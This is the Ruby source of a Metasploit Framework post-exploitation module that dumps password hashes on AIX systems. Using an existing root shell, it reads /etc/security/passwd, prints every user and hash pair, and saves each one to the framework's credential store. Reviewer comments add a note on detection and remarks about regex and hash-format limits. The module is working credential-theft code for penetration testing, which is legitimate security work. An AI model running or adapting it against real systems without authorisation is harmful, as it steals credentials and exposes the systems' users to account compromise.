rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/aix/hashdump.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
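# Post module that reads the AIX shadow password store
# (/etc/security/passwd) through an existing shell session, prints every
# user/hash pair it finds and records each one in the framework's credential
# store. The module metadata maps it to MITRE ATT&CK T1003.008.
#
# Defender's view: the only artefact visible in this code is a read of
# /etc/security/passwd by a root shell, so auditing access to that file is the
# natural detection point.
class MetasploitModule < Msf::Post
  include Msf::Post::File
  # NOTE(review): a Linux mixin on an AIX module; presumably pulled in for
  # is_root? -- confirm it behaves correctly on AIX.
  include Msf::Post::Linux::Priv

  # Registers the module's metadata (name, platform, session type, stability
  # notes and ATT&CK reference) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AIX Gather Dump Password Hashes',
        'Description' => %q{Post module to dump the password hashes for all users on an AIX system.},
        'License' => MSF_LICENSE,
        'Author' => ['theLightCosine'],
        'Platform' => [ 'aix' ],
        'SessionTypes' => [ 'shell' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        },
        'References' => [
          [ 'ATT&CK', Mitre::Attack::Technique::T1003_008_ETC_PASSWD_AND_ETC_SHADOW ]
        ]
      )
    )
  end

  # Parses /etc/security/passwd stanza by stanza and stores one credential per
  # user that has a hash value.
  #
  # Aborts through fail_with when the session is not root or when the file
  # could not be read.
  #
  # @return [void]
  def run
    fail_with(Failure::NoAccess, 'You must run this module as root!') unless is_root?

    passwd_file = read_file('/etc/security/passwd')
    # Without this guard a nil result raises NoMethodError on each_line and an
    # empty result ends the module silently with nothing reported.
    fail_with(Failure::NoAccess, 'Could not read /etc/security/passwd') if passwd_file.blank?

    username = ''
    hash = ''

    passwd_file.each_line do |line|
      # A stanza header is a line holding only "name:". Anchoring the pattern
      # keeps names containing '-' or '.' intact; the previous unanchored
      # /(\w+):/ captured only the trailing word of such a name, so the hash
      # was stored against the wrong username.
      user_line = line.match(/^\s*([^\s:=]+):\s*$/)
      username = user_line[1] if user_line

      # \w+ does not match '*', so stanzas whose password field is '*' are
      # skipped.
      # NOTE(review): \w+ also cannot match '{', so hashes written in
      # "{algorithm}..." form appear to be skipped as well, and every stored
      # hash is labelled 'des' below -- confirm against the target's
      # configured password algorithm.
      hash_line = line.match(/password = (\w+)/)
      hash = hash_line[1] if hash_line

      next unless hash.present?

      print_good("#{username}:#{hash}")
      credential_data = {
        jtr_format: 'des',
        origin_type: :session,
        post_reference_name: refname,
        private_type: :nonreplayable_hash,
        private_data: hash,
        session_id: session_db_id,
        username: username,
        workspace_id: myworkspace_id
      }
      create_credential(credential_data)

      # Reset so a later stanza without a hash cannot reuse this one.
      username = ''
      hash = ''
    end
  end
end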